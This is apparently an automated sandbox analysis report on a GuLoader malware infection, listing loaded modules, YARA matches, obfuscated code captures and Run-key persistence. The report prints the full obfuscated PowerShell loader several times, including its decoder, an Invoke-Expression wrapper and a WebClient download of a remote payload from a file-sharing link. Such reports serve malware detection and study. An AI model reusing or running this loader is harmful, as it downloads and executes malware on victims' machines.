        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe
        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
        Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Ricki = 1;$Gehenna='Substrin';$Gehenn", "", "", "0");
        Yara detected GuLoader
        Source: Yara matchFile source: 00000009.00000002.1940984455.000000000965B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.1930663126.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Takningers161 $Erhvervsrets $Tropein), (Isbaadenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aeroelastic = [AppDomain]::CurrentDomain.GetAssemblies()
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Plirede230)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Indlggelse, $false).DefineType($Euklidisk, $St
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8879900BD pushad ; iretd 3_2_00007FF8879900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887997954 push ebx; retf 3_2_00007FF88799796A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202109AD push ecx; mov dword ptr [esp], ecx12_2_202109B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02A056DD push dword ptr [ebx+edx*8]; ret 12_2_02A056E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02A037CC push edi; ret 12_2_02A03806
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02A02A0A push es; retf 12_2_02A02A0C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02A0384E push edi; ret 12_2_02A03806
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02A0498C push cs; ret 12_2_02A0498F

        Boot Survival

        barindex
        Creates autostart registry keys with suspicious names
        Source: C:\Windows\SysWOW64\openfiles.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBFJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBFJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBFJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
